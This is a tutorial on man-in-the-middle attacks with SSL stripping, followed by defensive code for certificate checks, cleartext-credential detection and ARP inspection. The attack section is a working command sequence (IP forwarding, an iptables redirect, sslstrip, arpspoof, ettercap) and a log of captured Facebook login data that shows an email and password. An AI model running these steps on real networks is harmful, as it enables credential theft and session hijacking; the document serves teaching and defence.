Man-in-the-Middle (MitM) Attack + HTTPS strip

What is SSL and how it works:

SSL is a security protocol that provides an encrypted tunnel between the client and the server. SSL uses the server's public/private key pair to protect the exchange of a symmetric session key, which is then used to encrypt and decrypt the transmitted data.

SSL Handshake process:


1. The client browser requests the web server's identification.

2. The server replies with a copy of its SSL certificate, including the server's public key.

3. The browser checks the certificate against its list of trusted CAs and verifies that it is unexpired, unrevoked and that its name is valid. If the browser trusts the certificate, it creates a session key (symmetric key), encrypts it with the server's public key and sends it to the server.

4. The server decrypts the symmetric session key and sends back to the client an acknowledgement encrypted with the session key to start the encrypted session.

5. The server and client now encrypt all transmitted data using the symmetric session key.
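As an added example (not from the original post), the following Python models the decision the browser makes in step 3. Certificates are plain dicts standing in for parsed X.509 fields (issuer, subject, SANs, validity dates, serial), and the trust store, revocation list and clock are constructed for the example, so it runs offline. The point it makes is that a certificate an attacker issued for the real hostname fails the trusted-CA check even when every other field looks right.

```python
"""Model of the checks a browser performs in step 3 of the SSL handshake.

Added example, not part of the original post. Certificates are modelled as
dicts rather than parsed X.509 objects so the checks run offline; the field
names (issuer, subject, sans, not_before, not_after, serial) are assumptions
that mirror the real X.509 fields they stand for.
"""
from datetime import datetime, timezone

# Constructed trust store: the issuers this "browser" trusts.
TRUSTED_CAS = {"Example Root CA"}
# Constructed revocation list: serial numbers the CA has revoked.
REVOKED_SERIALS = {"0x1337"}
# Constructed clock so the example is reproducible.
NOW = datetime(2025, 6, 1, tzinfo=timezone.utc)


def hostname_matches(pattern: str, hostname: str) -> bool:
    """RFC 6125 style match: exact, or a single '*' as the leftmost label
    that stands for exactly one label (so *.example.com matches
    a.example.com but neither example.com nor a.b.example.com)."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern == hostname:
        return True
    if not pattern.startswith("*."):
        return False
    p_labels = pattern.split(".")[1:]
    h_labels = hostname.split(".")
    return len(h_labels) == len(p_labels) + 1 and h_labels[1:] == p_labels


def verify_certificate(cert: dict, hostname: str, now: datetime,
                       trusted_cas=TRUSTED_CAS, revoked=REVOKED_SERIALS) -> list:
    """Return the reasons the certificate must be rejected; an empty list
    means the browser would go on to send the encrypted session key."""
    problems = []
    if cert["issuer"] not in trusted_cas:
        problems.append("issuer not in trusted CA list")
    if not (cert["not_before"] <= now <= cert["not_after"]):
        problems.append("certificate expired or not yet valid")
    if cert["serial"] in revoked:
        problems.append("certificate revoked")
    names = cert.get("sans") or [cert["subject"]]
    if not any(hostname_matches(n, hostname) for n in names):
        problems.append(f"name mismatch: {hostname} not in {names}")
    return problems


# Constructed certificates for the demonstration.
GOOD_CERT = {
    "issuer": "Example Root CA", "subject": "mail.example.com",
    "sans": ["mail.example.com", "*.mail.example.com"], "serial": "0x0001",
    "not_before": datetime(2024, 1, 1, tzinfo=timezone.utc),
    "not_after": datetime(2026, 1, 1, tzinfo=timezone.utc),
}
# What a man-in-the-middle presents: the real name, but signed by his own CA.
ATTACKER_CERT = dict(GOOD_CERT, issuer="Attacker CA", serial="0x0002")

if __name__ == "__main__":
    print("genuine :", verify_certificate(GOOD_CERT, "mail.example.com", NOW))
    print("attacker:", verify_certificate(ATTACKER_CERT, "mail.example.com", NOW))
```

The wildcard rule is the part people most often get wrong when hand-rolling this check: a `*.example.com` certificate must not be accepted for `example.com` itself or for deeper names.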


What is a Man-in-the-Middle Attack:

Also sometimes called a Monkey-in-the-Middle attack: a type of attack in which the attacker intercepts the traffic transmitted between the client and the server, copies it in an attempt to disclose its contents, and forwards it on to the correct destination so that the interception does not turn into a denial of service (DoS) and the victims are not made suspicious.

Attack Steps:

The steps below are taken from the BackBox Linux distro; you may use any Linux flavour you want and install the arpspoof, sslstrip and ettercap tools on it.

1. IP forwarding:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

If the command is not accepted, try one of the alternatives below:

$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"


Or

user@bt:~$ sudo -i
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

2. Redirecting traffic to the port that SSLstrip listens on:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234


3. Running SSLstrip:

user@bt:/pentest/web/sslstrip$ sudo python sslstrip.py -k -l 1234 -f lock.ico
  • -k: kills all currently active sessions, forcing users to log in to their websites again.
  • -l: the port to listen on (1234 here, matching the iptables rule above).
  • -f: substitutes a lock favicon to deceive the client into thinking the connection is secure.

4. ARP spoofing (ARP cache poisoning) of your network using the arpspoof tool:

arpspoof -i <interface> -t <targetIP> <gatewayIP>


5. Running ettercap to catch the username and password in the clear:

ettercap -Tq -i <interface>
  • -T: runs ettercap in text mode
  • -q: quiet mode; it does not print packet content. It is useful if you want to convert a pcap file to ettercap log files.

Or you can get them from the SSLstrip log, as below:

 user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log
2013-06-23 05:32:54,818 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:32:57,997 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:33:15,696 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023259_32LY&lgnjs=n&locale=en_US
Or you can perform session hijacking using Hamster.
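The log above is what the attacker sees; the defender's counterpart is a sensor on the wire that notices the same thing. The following Python is an added example (not from the original post) of that detection: it scans a request log for login forms posted over plaintext HTTP, which is exactly what a browser does while its HTTPS links are being stripped. The log format, the IP addresses and the request bodies are constructed for the example, and the list of credential field names is an assumption to be tuned per environment.

```python
"""Detect credentials submitted over plaintext HTTP.

Added example, not from the original post. When an SSL-stripping proxy is in
the path, the victim's browser posts login forms over port 80, so a network
sensor that sees plaintext POST bodies with password-like fields has a strong
signal that a downgrade is in progress (or that a site never used HTTPS).
The request-log format below is constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names that usually carry a secret. Assumption: tune per site.
CREDENTIAL_FIELDS = re.compile(r"^(pass(word|wd)?|pwd|secret|token|otp|pin)$", re.I)

# Constructed format: "<date> <time> <src> -> <dst>:<port> <METHOD> <url> | <body>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) -> (?P<dst>[^:]+):(?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<url>\S+) \|\s?(?P<body>.*)$"
)

# Constructed sample log (documentation IP ranges, invented credentials).
SAMPLE_LOG = [
    "2013-06-23 05:32:54 192.0.2.7 -> 198.51.100.20:80 POST http://www.example.com/login.php | "
    "lsd=AVrakCZQ&email=user%40example.com&pass=hunter2&locale=en_US",
    "2013-06-23 05:33:01 192.0.2.7 -> 198.51.100.20:80 GET http://www.example.com/home.php |",
    "2013-06-23 05:33:10 192.0.2.9 -> 198.51.100.20:80 POST http://www.example.com/search | q=cats&page=2",
    "2013-06-23 05:33:15 192.0.2.7 -> 198.51.100.20:80 POST http://www.example.com/session | "
    "username=alice&password=S3cret%21&remember=1",
]


def parse_line(line: str):
    """Split one log line into its fields, or return None if it is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec


def credential_fields(body: str) -> list:
    """Names of form fields in a URL-encoded body that look like secrets."""
    params = parse_qs(body, keep_blank_values=True)
    return sorted(k for k in params if CREDENTIAL_FIELDS.match(k))


def find_cleartext_credentials(lines) -> list:
    """One finding per POST that carried a secret over plaintext HTTP.
    Only field names are recorded: a detector must not become a second
    place where the victim's password ends up stored."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        url = urlsplit(rec["url"])
        if url.scheme != "http":          # TLS-protected posts are not visible here
            continue
        fields = credential_fields(rec["body"])
        if fields:
            findings.append({"time": rec["ts"], "victim": rec["src"],
                             "host": url.hostname, "fields": fields})
    return findings


if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_LOG):
        print(f"{f['time']} {f['victim']} sent {f['fields']} to {f['host']} in the clear")
```

A burst of such findings from one source address, against sites that normally serve their login pages over HTTPS, is the network-side signature of the attack described above; a single finding may just be a site that never used TLS.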

Defensive actions to be taken by the security professional:

  • The Dynamic ARP Inspection feature can be used to protect against ARP spoofing.
  • Make sure that the lock beside the URL bar exists and that its colour is green, as shown below; this makes you "slightly" sure that the connection is encrypted end-to-end (between client and server).
    • Trusted certificate examples:

Green lock – trusted certificate – Mozilla website
Green lock – trusted certificate – Gmail
  • Bad certificate example: in the following example a MITM attack occurs. The traffic between the victim and the attacker is encrypted with a certificate issued by the attacker; he decrypts the traffic, compromises it, encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.

Bad certificate – Gmail
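The Dynamic ARP Inspection item above and the arpspoof step in the attack section are two sides of the same check. The following Python is an added example (not from the original post) that models what DAI does: every ARP reply is validated against a trusted IP-to-MAC binding table, and replies that contradict it are dropped and alerted on. On a real switch the table is built by DHCP snooping; here the table and the stream of ARP replies are constructed by hand so the logic runs offline. A host without a managed switch can apply the same comparison to its own ARP cache, with the gateway binding as the entry that matters most.

```python
"""Model of Dynamic ARP Inspection: validate ARP replies against a trusted
IP-to-MAC binding table and drop or alert on mismatches.

Added example, not from the original post. The binding table (normally
learned by DHCP snooping) and the ARP replies are constructed for the
example; MACs and addresses are invented.
"""
from collections import defaultdict

# Constructed binding table: what DHCP snooping would have learned.
BINDINGS = {
    "192.0.2.1": "00:11:22:33:44:01",   # gateway
    "192.0.2.7": "00:11:22:33:44:07",   # victim workstation
    "192.0.2.9": "00:11:22:33:44:09",   # attacker's own lease
}

# Constructed ARP replies as (sender_ip, sender_mac, target_ip). ARP cache
# poisoning consists of unsolicited replies like the 2nd and 3rd entries:
# the attacker's MAC claiming the gateway's IP towards the victim, and the
# victim's IP towards the gateway.
ARP_REPLIES = [
    ("192.0.2.1", "00:11:22:33:44:01", "192.0.2.7"),   # genuine gateway reply
    ("192.0.2.1", "00:11:22:33:44:09", "192.0.2.7"),   # attacker claims gateway IP
    ("192.0.2.7", "00:11:22:33:44:09", "192.0.2.1"),   # attacker claims victim IP
    ("192.0.2.50", "00:11:22:33:44:50", "192.0.2.7"),  # unknown host, first claim
    ("192.0.2.50", "00:11:22:33:44:51", "192.0.2.7"),  # second MAC for same unknown IP
]


def inspect_arp(replies, bindings):
    """Return (accepted, alerts).

    A reply is dropped when its sender IP/MAC pair contradicts the binding
    table. For IPs the table does not know, a second MAC claiming the same
    IP is flagged as well; that is a weaker, heuristic signal, since a
    host may legitimately get a new NIC, but it is what a host-side
    monitor has to fall back on without DHCP snooping data."""
    accepted, alerts = [], []
    seen = defaultdict(set)   # ip -> MACs observed claiming it
    for ip, mac, target in replies:
        expected = bindings.get(ip)
        if expected is not None and expected.lower() != mac.lower():
            alerts.append(f"DROP: {mac} claims {ip}, binding says {expected} (sent to {target})")
            continue
        if expected is None:
            seen[ip].add(mac.lower())
            if len(seen[ip]) > 1:
                alerts.append(f"ALERT: {ip} claimed by multiple MACs {sorted(seen[ip])}")
                continue
        accepted.append((ip, mac, target))
    return accepted, alerts


if __name__ == "__main__":
    ok, alerts = inspect_arp(ARP_REPLIES, BINDINGS)
    print(f"{len(ok)} replies accepted, {len(alerts)} rejected")
    for a in alerts:
        print(a)
```

Note what the binding table buys you: the two poisoning replies are rejected outright because the attacker's MAC is already bound to a different address, whereas for the unknown 192.0.2.50 the detector can only notice the inconsistency once a second MAC shows up.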
